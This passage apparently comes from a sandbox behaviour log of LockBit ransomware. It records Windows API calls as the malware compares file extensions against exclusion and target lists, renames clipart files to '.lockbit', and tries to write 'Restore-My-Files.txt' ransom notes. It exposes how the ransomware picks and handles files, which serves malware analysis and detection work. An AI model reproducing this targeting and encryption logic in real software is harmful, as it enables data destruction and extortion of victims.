(lpString1=".frm", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.156] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.157] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.157] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.157] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.157] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.157] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.157] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.157] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.157] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF.lockbit") returned 72 [0148.157] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186364.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.158] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.158] malloc (_Size=0x40068) returned 0x3df0008 [0148.158] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18212) returned 1 [0148.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.160] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.180] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.180] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.180] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.183] free (_Block=0x1fa2ed8) [0148.183] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186364.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.183] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.183] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.183] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x19c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187647.WMF", cAlternateFileName="")) returned 1 [0148.183] lstrcmpiW (lpString1=".", lpString2="J0187647.WMF") returned -1 [0148.183] lstrcmpiW (lpString1="..", lpString2="J0187647.WMF") returned -1 [0148.183] PathFindExtensionW (pszPath="J0187647.WMF") returned=".WMF" [0148.183] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.183] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.184] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.184] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187647.WMF") returned 1 [0148.185] lstrcmpiW (lpString1="ntldr", lpString2="J0187647.WMF") returned 1 [0148.185] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187647.WMF") returned 1 [0148.185] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187647.WMF") returned -1 [0148.185] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187647.WMF") returned -1 [0148.185] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187647.WMF") returned 1 [0148.185] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187647.WMF") returned -1 [0148.185] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.185] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF") returned=".WMF" [0148.185] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.185] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.185] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.186] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.186] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF.lockbit") returned 72 [0148.186] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187647.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.188] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.188] malloc (_Size=0x40068) returned 0x3df0008 [0148.188] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6596) returned 1 [0148.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.189] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.190] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.193] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.193] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.193] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0148.194] free (_Block=0x1fa2ed8) [0148.194] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.194] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.194] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.195] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1500, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187815.WMF", cAlternateFileName="")) returned 1 [0148.195] lstrcmpiW (lpString1=".", lpString2="J0187815.WMF") returned -1 [0148.195] lstrcmpiW (lpString1="..", lpString2="J0187815.WMF") returned -1 [0148.195] PathFindExtensionW (pszPath="J0187815.WMF") returned=".WMF" [0148.195] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0148.195] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0148.196] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187815.WMF") returned 1 [0148.196] lstrcmpiW (lpString1="ntldr", lpString2="J0187815.WMF") returned 1 [0148.196] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187815.WMF") returned 1 [0148.196] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187815.WMF") returned -1 [0148.196] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187815.WMF") returned -1 [0148.196] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187815.WMF") returned 1 [0148.196] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187815.WMF") returned -1 [0148.196] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.196] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF") returned=".WMF" [0148.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.196] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.196] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.197] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.197] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF.lockbit") returned 72 [0148.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187815.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.198] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.198] malloc (_Size=0x40068) returned 0x3df0008 [0148.198] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5376) returned 1 [0148.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.200] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0148.207] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0148.207] malloc (_Size=0xa6) returned 0x1fa2ed8 [0148.207] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0148.208] free (_Block=0x1fa2ed8) [0148.208] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0148.208] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0148.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0148.208] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187817.WMF", cAlternateFileName="")) returned 1 [0148.208] lstrcmpiW (lpString1=".", lpString2="J0187817.WMF") returned -1 [0148.208] lstrcmpiW (lpString1="..", lpString2="J0187817.WMF") returned -1 [0148.208] PathFindExtensionW (pszPath="J0187817.WMF") returned=".WMF" [0148.208] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0148.208] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0148.209] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0148.209] 